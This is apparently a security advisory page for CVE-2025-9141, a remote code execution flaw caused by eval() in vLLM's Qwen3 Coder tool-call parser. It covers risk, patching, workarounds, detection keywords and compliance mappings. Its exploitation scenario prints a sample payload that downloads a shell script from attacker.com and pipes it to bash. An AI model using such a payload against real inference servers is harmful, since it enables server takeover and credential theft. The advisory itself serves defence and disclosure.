CVE-2025-9141 — HIGH (CVSS 8.8) AI Security Vulnerability

CISO Take

If you run vLLM >=0.10.0 with Qwen3 Coder and tool calling enabled, any authenticated API user can execute arbitrary code on your inference server — patch to 0.10.1.1 immediately. As an immediate workaround, remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, making post-exploitation blast radius severe.

Risk Assessment

High severity (CVSS 8.8). Exploitability is high: network-accessible, low complexity, requires only standard API authentication with no elevated privileges or user interaction needed. LLM inference servers commonly hold API keys, model weights, and internal network access. vLLM is a widely-deployed inference backbone across enterprise and cloud AI stacks, broadening exposure significantly.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
vllm	pip	>= 0.10.0, < 0.10.1.1	`0.10.1.1`
78.9K 126 dependents Pushed 6d ago 56% patched ~32d to patch Full package profile →

Do you use vllm? You're affected.

Severity & Risk

CVSS 3.1

8.8 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Moderate

Attack Surface

AV Network

AC Low

PR Low

UI None

S Unchanged

C High

I High

A High

Recommended Action

5 steps

PATCH

Upgrade vllm to >=0.10.1.1 immediately on all inference nodes.
WORKAROUND (if patching is delayed): Remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services.
NETWORK

Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting.
DETECT

Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators.
VERIFY

Audit all running vLLM versions with 'pip show vllm' across inference nodes.

Classification

Code Execution Supply Chain Inference Framework Agent AML.T0010.001 - AI Software AML.T0040 - AI Model Inference API Access AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation

Compliance Impact

This CVE is relevant to:

EU AI Act

Art.15 - Accuracy, Robustness and Cybersecurity

ISO 42001

A.6.2 - AI System Operation and Monitoring

NIST AI RMF

MANAGE-2.2 - Mechanisms for AI Risk Treatment

OWASP LLM Top 10

LLM02 - Insecure Output Handling LLM05 - Supply Chain Vulnerabilities LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2025-9141?

If you run vLLM >=0.10.0 with Qwen3 Coder and tool calling enabled, any authenticated API user can execute arbitrary code on your inference server — patch to 0.10.1.1 immediately. As an immediate workaround, remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, making post-exploitation blast radius severe.

Is CVE-2025-9141 actively exploited?

No confirmed active exploitation of CVE-2025-9141 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-9141?

1. PATCH: Upgrade vllm to >=0.10.1.1 immediately on all inference nodes. 2. WORKAROUND (if patching is delayed): Remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services. 3. NETWORK: Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting. 4. DETECT: Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators. 5. VERIFY: Audit all running vLLM versions with 'pip show vllm' across inference nodes.

What systems are affected by CVE-2025-9141?

This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, agent frameworks, tool-enabled LLM pipelines, agentic AI platforms, multi-tenant AI API services.

What is the CVSS score for CVE-2025-9141?

CVE-2025-9141 has a CVSS v3.1 base score of 8.8 (HIGH).

Technical Details

NVD Description

### Summary An unsafe deserialization vulnerability allows any authenticated user to execute arbitrary code on the server if they are able to get the model to pass the code as an argument to a tool call. ### Details vLLM's [Qwen3 Coder tool parser](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/tool_parsers/qwen3coder_tool_parser.py) contains a code execution path that uses Python's `eval()` function to parse tool call parameters. This occurs during the parameter conversion process when the parser attempts to handle unknown data types. This code path is reached when: 1. Tool calling is enabled (`--enable-auto-tool-choice`) 2. The qwen3_coder parser is specified (`--tool-call-parser qwen3_coder`) 3. The parameter type is not explicitly defined or recognized ### Impact Remote Code Execution via Python's `eval()` function.

Exploitation Scenario

An adversary with valid but low-privileged API credentials (stolen service account, malicious insider, or compromised client in a multi-tenant deployment) sends a crafted tool call request to a vLLM endpoint running Qwen3 Coder. The tool call includes a parameter with an unrecognized or ambiguous type, triggering the parser's eval() fallback path. The adversary injects a payload such as __import__('os').system('curl attacker.com/shell.sh | bash') as the parameter value. This executes on the inference server under the process owner's privileges, enabling credential theft, internal network pivoting, model weight exfiltration, or persistent backdoor installation.